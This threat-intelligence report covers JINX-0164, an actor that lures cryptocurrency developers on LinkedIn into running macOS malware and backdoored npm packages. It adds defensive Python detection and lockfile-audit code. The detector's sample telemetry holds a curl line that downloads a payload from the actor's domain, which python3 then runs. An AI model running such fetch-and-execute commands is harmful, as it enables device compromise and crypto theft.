JINX-0164: Financially Motivated Actor Uses Social Engineering and Custom macOS Malware in Crypto Heists

New Threat Actor 'JINX-0164' Targets Crypto Firms with Custom macOS Malware

Severity: HIGH
May 28, 2026
Threat Actor, Malware, Supply Chain Attack

Related Entities

Threat Actors: JINX-0164, BlueNoroff

Organizations: Wiz

Other: AUDIOFIX, MiniRAT, LinkedIn


Executive Summary

Security researchers at Wiz have identified a new, financially motivated threat actor, dubbed JINX-0164, that specializes in targeting developers at cryptocurrency firms with custom macOS malware. Active since at least mid-2025, the group employs a multi-stage attack that begins with sophisticated social engineering on professional networks like LinkedIn. Victims are tricked into downloading what appears to be a meeting client, which instead deploys a custom Python-based infostealer and Remote Access Trojan (RAT) named AUDIOFIX. JINX-0164 has also demonstrated supply chain attack capabilities, previously distributing a Go-based backdoor called MiniRAT through a malicious version of a legitimate npm package. The ultimate goal is the theft of digital assets by compromising developer machines and CI/CD pipelines.

Threat Overview

  • Threat Actor: JINX-0164
  • Targeting: Developers and engineers within the cryptocurrency industry.
  • Malware:
    • AUDIOFIX: A Python-based macOS infostealer and RAT.
    • MiniRAT: A Go-based backdoor.
  • Attack Vectors: Social engineering, supply chain attack (compromised npm package).
  • Motivation: Financial gain through theft of cryptocurrency.

Technical Analysis

The attack chain used by JINX-0164 is well-orchestrated and tailored to its targets:

  1. Reconnaissance & Luring (T1589 - Gather Victim Identity Information): The actor identifies developers at crypto firms on LinkedIn and initiates contact with fake job offers or meeting requests.
  2. Initial Access (T1566.002 - Phishing: Spearphishing Link): The target is directed to a malicious domain impersonating a legitimate service (e.g., apple.driver-store[.]com).
  3. Execution (T1204.002 - User Execution: Malicious File): The user is tricked into downloading and running a malicious file disguised as a meeting client. This file is a bash script.
  4. Command and Control / Payload Retrieval (T1105 - Ingress Tool Transfer): The initial bash script downloads the main payload, the AUDIOFIX malware, from the attacker-controlled domain.
  5. Malware Capabilities (AUDIOFIX): The Python RAT can upload files from the victim's machine, execute arbitrary shell commands, and download additional payloads, giving the attacker full control.
  6. Supply Chain Attack (T1195.002 - Compromise Software Supply Chain: Compromise Software Dependencies): In a separate TTP, the actor compromised the @velora-dex/sdk npm package to distribute the MiniRAT backdoor, showing a higher level of sophistication.

While some TTPs, like targeting crypto developers and using VPN services, are similar to North Korean APT groups like BlueNoroff, researchers have not found sufficient evidence to attribute JINX-0164 to them at this time.

Impact Assessment

JINX-0164 poses a significant threat to the cryptocurrency ecosystem. By specifically targeting developers and their CI/CD infrastructure, the group aims to compromise systems at the heart of digital asset management. A successful attack could lead to:

  • Theft of private keys from developer machines.
  • Compromise of code repositories to inject malicious code into smart contracts or applications.
  • Large-scale theft of funds from the targeted company or its users.
  • Significant reputational damage and loss of trust in the compromised platform.

The use of custom macOS malware shows that attackers are increasingly focusing on Apple's platform as it becomes more prevalent in corporate and development environments.

IOCs — Directly from Articles

Type          Value                      Description
domain        apple.driver-store[.]com   Malicious domain used to host malware payloads.
package_name  @velora-dex/sdk            Compromised npm package used to distribute MiniRAT.

Detection & Response

  • Endpoint Monitoring (macOS): Use EDR solutions with macOS support to monitor for suspicious process execution, especially Python scripts running with unusual permissions or making network connections.
  • Network Filtering: Block known malicious domains like apple.driver-store[.]com at the network perimeter.
  • Dependency Scanning: For development teams, use tools to scan software dependencies for known vulnerabilities or malicious packages. Check the integrity of packages downloaded from repositories like npm.
  • Developer Awareness: Train developers on the risks of social engineering attacks targeting them specifically and to be cautious about downloading and executing software from unverified sources.
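The endpoint-monitoring bullet above can be turned into concrete rules. The following is an added example, not code from Wiz or from the report: it runs a handful of behavioural checks over constructed macOS process and network events that mirror the chain described in the Technical Analysis (a shell script launched from Downloads, curl spawned by that shell, python3 running a dropped script and reaching the network). The event schema, tool paths and sample telemetry are assumptions; only the domain comes from the IOC table, and the curl URL path is omitted because the report gives only the domain.

```python
"""Behavioural detection for the JINX-0164 chain on macOS process/network
telemetry. Added example (not Wiz's or the report's code): event schema,
tool paths and the sample events below are assumptions/constructed."""
import json
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (JSON lines), modelled on the reported chain:
# downloaded shell "meeting client" -> curl fetch from the IOC domain ->
# python3 runs the dropped payload and talks back to the same domain.
# A benign python3 test run against pypi.org is included as a control.
SAMPLE_EVENTS = """
{"ts":"2026-05-28T10:01:02Z","host":"dev-mbp","event":"process","pid":4410,"ppid":4401,"exe":"/bin/bash","cmdline":"bash /Users/dev/Downloads/MeetingClient.sh","user":"dev"}
{"ts":"2026-05-28T10:01:03Z","host":"dev-mbp","event":"process","pid":4412,"ppid":4410,"exe":"/usr/bin/curl","cmdline":"curl -fsSL -o /tmp/.a apple.driver-store.com","user":"dev"}
{"ts":"2026-05-28T10:01:05Z","host":"dev-mbp","event":"process","pid":4415,"ppid":4410,"exe":"/usr/bin/python3","cmdline":"python3 /tmp/.a","user":"dev"}
{"ts":"2026-05-28T10:01:06Z","host":"dev-mbp","event":"network","pid":4415,"exe":"/usr/bin/python3","dst_host":"apple.driver-store.com","dst_port":443}
{"ts":"2026-05-28T10:02:00Z","host":"dev-mbp","event":"process","pid":4500,"ppid":1,"exe":"/usr/bin/python3","cmdline":"python3 -m pytest tests/","user":"dev"}
{"ts":"2026-05-28T10:02:01Z","host":"dev-mbp","event":"network","pid":4500,"exe":"/usr/bin/python3","dst_host":"pypi.org","dst_port":443}
"""

IOC_DOMAINS = {"apple.driver-store[.]com"}  # from the report's IOC table (defanged)
SHELLS = ("/bin/bash", "/bin/sh", "/bin/zsh")
DOWNLOADERS = ("/usr/bin/curl", "/usr/bin/wget")
USER_DROP_DIRS = re.compile(r"/Users/[^/]+/(Downloads|Desktop)/|/Volumes/")
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")


def refang(domain: str) -> str:
    """Turn a defanged indicator back into the form seen in telemetry."""
    return domain.replace("[.]", ".")


def load_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings. The first rule is the exact IOC match; the
    others are behavioural and keep firing if the actor rotates domains."""
    procs = {e["pid"]: e for e in events if e["event"] == "process"}
    ioc_hosts = {refang(d) for d in IOC_DOMAINS}
    findings: List[Tuple[str, int]] = []

    for e in events:
        pid = e["pid"]
        if e["event"] == "network":
            if e.get("dst_host") in ioc_hosts:
                findings.append(("ioc_domain_contact", pid))
            proc = procs.get(pid)
            # Interpreter running a script out of a scratch dir and reaching the network
            if proc and proc["exe"].endswith("python3") and any(
                s in proc["cmdline"] for s in SCRATCH_DIRS
            ):
                findings.append(("python_scratch_script_network", pid))
            continue

        cmd = e["cmdline"]
        parent = procs.get(e.get("ppid"))
        # Shell interpreting a script that sits where a browser or mounted DMG puts files
        if e["exe"] in SHELLS and USER_DROP_DIRS.search(cmd):
            findings.append(("shell_script_from_user_download", pid))
        # curl/wget spawned by such a shell: the ingress tool transfer step (T1105)
        if (
            e["exe"] in DOWNLOADERS
            and parent is not None
            and parent["exe"] in SHELLS
            and USER_DROP_DIRS.search(parent["cmdline"])
        ):
            findings.append(("downloader_spawned_by_downloaded_script", pid))
    return findings


def suspect_pids(events: List[Dict]) -> List[int]:
    """Distinct PIDs that tripped at least one rule, for triage."""
    return sorted({pid for _, pid in detect(events)})


if __name__ == "__main__":
    evs = load_events(SAMPLE_EVENTS)
    for rule, pid in detect(evs):
        print(f"{rule:45} pid={pid}")
```

The control events (pytest talking to pypi.org) produce no findings, which is the point of keying the Python rule on a script path in a scratch directory rather than on python3 network activity alone; developer machines run Python that talks to the network all day.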

Mitigation

  1. User Training (M1017 - User Training): Educate employees, especially developers, about the specific social engineering tactics used by groups like JINX-0164.
  2. Application Vetting: Implement policies that restrict the installation of software from untrusted sources. Use macOS's built-in security features like Gatekeeper and Notarization.
  3. Secure CI/CD Pipeline: Harden the CI/CD environment with strict access controls, MFA, and regular audits. Do not store sensitive credentials like private keys on developer workstations.
  4. Supply Chain Security: Implement strict controls around the use of third-party libraries. Use private registries or scoped packages and perform security reviews of dependencies.
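The dependency-scanning point under Detection & Response and the supply-chain item above both come down to auditing what the lockfile actually pins. This added example (not code from Wiz or from the report) walks a constructed npm `package-lock.json` (lockfileVersion 3 layout) and flags entries resolved from outside a private registry, entries without a sha512 integrity hash, entries that carry an install script, and any occurrence of the package named in the report. The private registry hostname, the sample lockfile and its versions are assumptions; the report does not say which version of @velora-dex/sdk was malicious, so the check flags the package for review rather than matching a version.

```python
"""Lockfile audit against a simple supply-chain policy. Added example, not
the report's or any project's code; registry host and lockfile are constructed."""
import base64
import hashlib
import json
from typing import Dict, List, Tuple
from urllib.parse import urlparse

ALLOWED_REGISTRY_HOSTS = {"npm.internal.example"}  # hypothetical private registry
WATCHLIST = {"@velora-dex/sdk"}  # package named in the report; version not given there


def _sri(data: bytes) -> str:
    """Build a Subresource Integrity string the way npm records it."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


# Constructed lockfile: one clean entry, one that trips several rules, one
# missing its integrity field. Versions and tarball contents are made up.
SAMPLE_LOCK: Dict = {
    "name": "wallet-service",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "wallet-service",
             "dependencies": {"left-pad": "^1.3.0", "@velora-dex/sdk": "*", "tiny-util": "^2.0.0"}},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://npm.internal.example/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": _sri(b"constructed tarball: left-pad"),
        },
        "node_modules/@velora-dex/sdk": {
            "version": "0.0.0-constructed",
            "resolved": "https://registry.npmjs.org/@velora-dex/sdk/-/sdk-0.0.0-constructed.tgz",
            "integrity": _sri(b"constructed tarball: sdk"),
            "hasInstallScript": True,
        },
        "node_modules/tiny-util": {
            "version": "2.0.0",
            "resolved": "https://npm.internal.example/tiny-util/-/tiny-util-2.0.0.tgz",
        },
    },
}


def package_name(path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (handles scoped and nested)."""
    return path.rsplit("node_modules/", 1)[-1]


def valid_sha512_sri(value) -> bool:
    """Accept only a well-formed sha512 SRI string (64-byte digest)."""
    if not isinstance(value, str) or not value.startswith("sha512-"):
        return False
    try:
        return len(base64.b64decode(value[len("sha512-"):], validate=True)) == 64
    except ValueError:
        return False


def audit_lockfile(lock: Dict) -> List[Tuple[str, str]]:
    """Return (finding, package) pairs for every policy violation in the lockfile."""
    findings: List[Tuple[str, str]] = []
    for path, entry in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project itself
        name = package_name(path)
        host = urlparse(entry.get("resolved", "")).hostname
        if host not in ALLOWED_REGISTRY_HOSTS:
            findings.append(("unexpected_registry", name))
        if not valid_sha512_sri(entry.get("integrity")):
            findings.append(("missing_or_weak_integrity", name))
        if entry.get("hasInstallScript"):  # npm sets this for pre/post/install hooks
            findings.append(("install_script", name))
        if name in WATCHLIST:
            findings.append(("watchlist_package", name))
    return findings


def audit_lockfile_text(text: str) -> List[Tuple[str, str]]:
    return audit_lockfile(json.loads(text))


if __name__ == "__main__":
    for finding, name in audit_lockfile_text(json.dumps(SAMPLE_LOCK)):
        print(f"{finding:28} {name}")
```

Run it in CI against the committed lockfile and fail the build on any finding; the install-script rule is worth keeping even for packages you trust, because a lifecycle hook is exactly where a backdoored version would gain execution on a developer machine or build runner.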

Timeline of Events

  1. May 28, 2026: This article was published.

MITRE ATT&CK Mitigations

  • Educate developers on the specific social engineering tactics targeting them on platforms like LinkedIn.
  • Use application controls on macOS to prevent the execution of unsigned or untrusted scripts and applications.
  • Implement security measures for software development dependencies, such as using a private package registry and scanning for malicious packages.

Article Author

Jason Gomes, Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

JINX-0164, macOS, malware, cryptocurrency, infostealer, RAT, supply chain attack, npm
